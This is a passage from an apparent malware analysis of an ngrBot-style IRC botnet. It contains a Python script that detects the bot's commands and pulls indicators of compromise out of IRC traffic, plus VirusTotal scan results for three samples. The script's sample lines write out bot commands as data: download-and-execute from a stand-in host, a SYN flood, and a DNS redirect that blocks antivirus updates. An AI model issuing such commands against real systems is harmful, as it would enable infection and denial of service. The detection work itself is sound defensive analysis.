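For detection, the command grammar above is enough to classify captured IRC control traffic and pull out the indicators an analyst needs: download and update URLs, update hashes, DNS block/redirect rules and flood targets. The script below is an added example, my code rather than anything from the write-up or from the bot; the command-to-family labels, the PRIVMSG regex and the sample IRC lines are my own constructions (the sample uses RFC 5737 documentation addresses and `.example` names), and the !mdns interpretation follows the one-argument-blocks, two-arguments-redirect rule and the "IP address to domain does not work" note given above.

```python
"""Classify ngrBot-style IRC commands in captured PRIVMSG lines and extract IoCs.

Added example, not code from the original write-up or from the bot. The command
set and the !mdns semantics come from the command reference above; the family
labels and the sample lines are constructed for this example.
"""
import re
from urllib.parse import urlparse

# Command families (labels are my own grouping of the reference above).
COMMAND_FAMILIES = {
    "!dl": "download-execute", "!up": "update", "!rm": "uninstall", "!die": "disconnect",
    "!ssyn": "ddos", "!udp": "ddos", "!slow": "ddos", "!stop": "ddos",
    "!mdns": "dns-tamper", "!mod": "module-toggle",
    "!msn.set": "spread-config", "!msn.int": "spread-config",
    "!http.set": "spread-config", "!http.int": "spread-config",
    "!logins": "credential-theft", "!stats": "status", "!v": "status",
    "!j": "channel", "!p": "channel", "!s": "channel", "!us": "channel",
    "!vs": "browser-visit", "!rc": "reconnect", "!m": "mute",
}

PRIVMSG_RE = re.compile(r"^:(?P<nick>[^!\s]+)!\S+ PRIVMSG (?P<target>\S+) :(?P<text>.*)$")
IPV4_RE = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")
MD5_RE = re.compile(r"^[0-9a-fA-F]{32}$")

# Constructed sample of IRC traffic as it might appear in a packet capture.
SAMPLE_IRC = [
    ":op!oper@c2.example PRIVMSG #RU :!dl http://dl.example/facebook-pic.exe -r",
    ":op!oper@c2.example PRIVMSG #all :!mdns download666.avast.com 127.0.0.1",
    ":op!oper@c2.example PRIVMSG #all :!ssyn 203.0.113.10 80 60",
    ":op!oper@c2.example PRIVMSG #all :!up http://dl.example/update.exe d41d8cd98f00b204e9800998ecf8427e",
    ":someone!u@host.example PRIVMSG #RU :hello there",
]


def parse_mdns_rule(args):
    """Interpret !mdns arguments: one argument blocks (or loads a rule file
    when it is a URL), two arguments redirect; IP -> domain is unsupported."""
    if not args:
        return None
    if len(args) == 1:
        if args[0].lower().startswith(("http://", "https://")):
            return {"action": "load-rules", "source": args[0]}
        return {"action": "block", "source": args[0]}
    src, dst = args[0], args[1]
    if IPV4_RE.match(src) and not IPV4_RE.match(dst):
        return {"action": "unsupported", "source": src, "destination": dst}
    return {"action": "redirect", "source": src, "destination": dst}


def classify_line(line):
    """Return a classification dict for a PRIVMSG carrying a known command, else None."""
    m = PRIVMSG_RE.match(line.strip())
    if not m:
        return None
    text = m.group("text").strip()
    if not text.startswith("!"):
        return None
    parts = text.split()
    cmd, args = parts[0].lower(), parts[1:]
    family = COMMAND_FAMILIES.get(cmd)
    if family is None:
        return None
    result = {"nick": m.group("nick"), "channel": m.group("target"), "command": cmd,
              "family": family, "args": args, "iocs": {"urls": [], "md5": [], "hosts": []}}
    for a in args:
        if a.lower().startswith(("http://", "https://")):
            result["iocs"]["urls"].append(a)
            host = urlparse(a).hostname
            if host:
                result["iocs"]["hosts"].append(host)
        elif MD5_RE.match(a):
            result["iocs"]["md5"].append(a.lower())
    if family == "ddos" and cmd != "!stop" and args:
        result["iocs"]["hosts"].append(args[0])  # flood target per the reference
    if cmd == "!mdns":
        result["dns_rule"] = parse_mdns_rule(args)
    return result


def scan_log(lines):
    """Classify every line; lines that are not bot commands are dropped."""
    return [r for r in (classify_line(l) for l in lines) if r]


def collect_iocs(results):
    """Deduplicated, sorted indicators across all classified commands."""
    merged = {"urls": set(), "md5": set(), "hosts": set()}
    for r in results:
        for key, values in r["iocs"].items():
            merged[key].update(values)
    return {key: sorted(values) for key, values in merged.items()}


if __name__ == "__main__":
    results = scan_log(SAMPLE_IRC)
    for r in results:
        print(f"{r['channel']} {r['command']:<9} {r['family']:<18} {' '.join(r['args'])}")
    print(collect_iocs(results))
```

The `hosts` list deliberately mixes hosts the bot is told to contact (download servers) with hosts it is told to attack (flood targets); in a real pipeline keep the `family` alongside each indicator so the two are not conflated in a blocklist.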


VirusTotal Results

facebook-pic0008422012.exe
Additional information
MD5: 617fc475c1f0120571d8f21493f60959
SHA1: e3fcfa0fe9ac759be324479e0a861f8a303b9ff1
SHA256: 128f4e7f429a8a8c785f3d3f46829ee756ce2f8d7cd509c326183966c5d318ae
File size: 169472 bytes
Scan date: 2011-08-03 13:21:51 (UTC)

Antivirus | Version | Last update | Result
AhnLab-V3 | 2011.08.03.02 | 2011.08.03 | -
AntiVir | 7.11.12.200 | 2011.08.03 | -
Antiy-AVL | 2.0.3.7 | 2011.08.03 | -
Avast | 4.8.1351.0 | 2011.08.03 | -
Avast5 | 5.0.677.0 | 2011.08.03 | -
AVG | 10.0.0.1190 | 2011.08.03 | SHeur3.CMHH
BitDefender | 7.2 | 2011.08.03 | Gen:Variant.FakeAlert.75
CAT-QuickHeal | 11.00 | 2011.08.03 | -
ClamAV | 0.97.0.0 | 2011.08.03 | -
Commtouch | 5.3.2.6 | 2011.08.03 | -
Comodo | 9614 | 2011.08.03 | -
DrWeb | 5.0.2.03300 | 2011.08.03 | -
Emsisoft | 5.1.0.8 | 2011.08.03 | -
eSafe | 7.0.17.0 | 2011.08.03 | -
eTrust-Vet | 36.1.8479 | 2011.08.02 | -
F-Prot | 4.6.2.117 | 2011.08.03 | -
F-Secure | 9.0.16440.0 | 2011.08.03 | Gen:Variant.FakeAlert.75
Fortinet | 4.2.257.0 | 2011.08.03 | -
GData | 22 | 2011.08.03 | Gen:Variant.FakeAlert.75
Ikarus | T3.1.1.104.0 | 2011.08.03 | -
Jiangmin | 13.0.900 | 2011.08.02 | -
K7AntiVirus | 9.109.4973 | 2011.08.02 | -
Kaspersky | 9.0.0.837 | 2011.08.03 | UDS:DangerousObject.Multi.Generic
McAfee | 5.400.0.1158 | 2011.08.03 | -
McAfee-GW-Edition | 2010.1D | 2011.08.03 | Heuristic.LooksLike.Win32.Suspicious.C
Microsoft | 1.7104 | 2011.08.03 | -
NOD32 | 6346 | 2011.08.03 | a variant of Win32/Injector.IIF
Norman | 6.07.10 | 2011.08.03 | -
nProtect | 2011-08-03.04 | 2011.08.03 | Gen:Variant.FakeAlert.75
Panda | 10.0.3.5 | 2011.08.03 | Suspicious file
PCTools | 8.0.0.5 | 2011.08.03 | -
Prevx | 3.0 | 2011.08.03 | -
Rising | 23.69.02.03 | 2011.08.03 | Suspicious
Sophos | 4.67.0 | 2011.08.03 | -
SUPERAntiSpyware | 4.40.0.1006 | 2011.08.03 | Trojan.Agent/Gen-Falcomp
Symantec | 20111.1.0.186 | 2011.08.03 | -
TheHacker | 6.7.0.1.269 | 2011.08.03 | -
TrendMicro | 9.200.0.1012 | 2011.08.03 | -
TrendMicro-HouseCall | 9.200.0.1012 | 2011.08.03 | -
VBA32 | 3.12.16.4 | 2011.08.03 | -
VIPRE | 10051 | 2011.08.03 | -
ViRobot | 2011.8.3.4603 | 2011.08.03 | -
VirusBuster | 14.0.150.0 | 2011.08.02 | -

milkway.exe - 1.tmp
Additional information
MD5: a17c070c23a4b8be33466d735b460551
SHA1: 8d861e95525081603101b0fc129ed9c135bd226f
SHA256: 960c2aa3408c6729d557337893cfba65b6565551c32f1a506e50e1fc72279397
File size: 118784 bytes
Scan date: 2011-08-03 16:36:48 (UTC)

Antivirus | Version | Last update | Result
AntiVir | 7.11.12.202 | 2011.08.03 | -
Antiy-AVL | 2.0.3.7 | 2011.08.03 | -
Avast | 4.8.1351.0 | 2011.08.03 | -
Avast5 | 5.0.677.0 | 2011.08.03 | -
CAT-QuickHeal | 11.00 | 2011.08.03 | -
ClamAV | 0.97.0.0 | 2011.08.03 | -
Commtouch | 5.3.2.6 | 2011.08.03 | -
Comodo | 9617 | 2011.08.03 | -
eSafe | 7.0.17.0 | 2011.08.03 | -
eTrust-Vet | 36.1.8481 | 2011.08.03 | -
F-Prot | 4.6.2.117 | 2011.08.03 | -
Fortinet | 4.2.257.0 | 2011.08.03 | W32/Injector.HCR!tr
Ikarus | T3.1.1.104.0 | 2011.08.03 | -
Jiangmin | 13.0.900 | 2011.08.03 | -
K7AntiVirus | 9.109.4973 | 2011.08.02 | -
Kaspersky | 9.0.0.837 | 2011.08.03 | Trojan-Dropper.Win32.Injector.ahk
McAfee | 5.400.0.1158 | 2011.08.03 | -
McAfee-GW-Edition | 2010.1D | 2011.08.03 | -
Microsoft | 1.7104 | 2011.08.03 | -
NOD32 | 6347 | 2011.08.03 | -
Norman | 6.07.10 | 2011.08.03 | -
nProtect | 2011-08-03.04 | 2011.08.03 | -
PCTools | 8.0.0.5 | 2011.08.03 | -
Prevx | 3.0 | 2011.08.03 | -
Rising | 23.69.02.03 | 2011.08.03 | -
Sophos | 4.67.0 | 2011.08.03 | -
SUPERAntiSpyware | 4.40.0.1006 | 2011.08.03 | -
Symantec | 20111.1.0.186 | 2011.08.03 | -
TheHacker | 6.7.0.1.269 | 2011.08.03 | -
TrendMicro | 9.200.0.1012 | 2011.08.03 | -
TrendMicro-HouseCall | 9.200.0.1012 | 2011.08.03 | -
VBA32 | 3.12.16.4 | 2011.08.03 | -
VIPRE | 10053 | 2011.08.03 | Trojan.Win32.Generic.pak!cobra
ViRobot | 2011.8.3.4603 | 2011.08.03 | -
VirusBuster | 14.0.150.0 | 2011.08.02 | -

memory.exe - windows.exe
Additional information
MD5: 0d8da66c26b7c8ab1c0b447f8fbcbf07
SHA1: b0c1b7f366173d1c455f53d641a28b5b5c0563bf
SHA256: fdc8db0fea65a7d81e3bc151b19f05f93ab278f095fc7a88545f36497f8459da
File size: 122880 bytes
Scan date: 2011-08-03 11:22:09 (UTC)

Antivirus | Version | Last update | Result
AhnLab-V3 | 2011.08.03.01 | 2011.08.03 | -
AntiVir | 7.11.12.200 | 2011.08.03 | -
Antiy-AVL | 2.0.3.7 | 2011.08.03 | -
Avast | 4.8.1351.0 | 2011.08.02 | -
Avast5 | 5.0.677.0 | 2011.08.02 | -
AVG | 10.0.0.1190 | 2011.08.03 | -
BitDefender | 7.2 | 2011.08.03 | -
CAT-QuickHeal | 11.00 | 2011.08.03 | -
ClamAV | 0.97.0.0 | 2011.08.03 | -
Commtouch | 5.3.2.6 | 2011.08.03 | -
Comodo | 9611 | 2011.08.03 | -
DrWeb | 5.0.2.03300 | 2011.08.03 | -
Emsisoft | 5.1.0.8 | 2011.08.03 | -
eSafe | 7.0.17.0 | 2011.08.03 | -
eTrust-Vet | 36.1.8479 | 2011.08.02 | -
F-Prot | 4.6.2.117 | 2011.08.03 | -
F-Secure | 9.0.16440.0 | 2011.08.03 | -
Fortinet | 4.2.257.0 | 2011.08.03 | W32/Injector.HCR!tr
GData | 22 | 2011.08.03 | -
Ikarus | T3.1.1.104.0 | 2011.08.03 | -
Jiangmin | 13.0.900 | 2011.08.02 | -
K7AntiVirus | 9.109.4973 | 2011.08.02 | -
Kaspersky | 9.0.0.837 | 2011.08.03 | -
McAfee | 5.400.0.1158 | 2011.08.03 | -
McAfee-GW-Edition | 2010.1D | 2011.08.03 | -
Microsoft | 1.7104 | 2011.08.03 | -
NOD32 | 6346 | 2011.08.03 | -
Norman | 6.07.10 | 2011.08.03 | -
nProtect | 2011-08-03.04 | 2011.08.03 | -
Panda | 10.0.3.5 | 2011.08.02 | -
PCTools | 8.0.0.5 | 2011.08.03 | -
Prevx | 3.0 | 2011.08.03 | -
Rising | 23.69.02.03 | 2011.08.03 | -
Sophos | 4.67.0 | 2011.08.03 | -
SUPERAntiSpyware | 4.40.0.1006 | 2011.08.03 | -
Symantec | 20111.1.0.186 | 2011.08.03 | -
TheHacker | 6.7.0.1.267 | 2011.08.02 | -
TrendMicro | 9.200.0.1012 | 2011.08.03 | -
TrendMicro-HouseCall | 9.200.0.1012 | 2011.08.03 | -
VBA32 | 3.12.16.4 | 2011.08.02 | -
VIPRE | 10050 | 2011.08.03 | -
ViRobot | 2011.8.3.4603 | 2011.08.03 | -
VirusBuster | 14.0.150.0 | 2011.08.02 | -

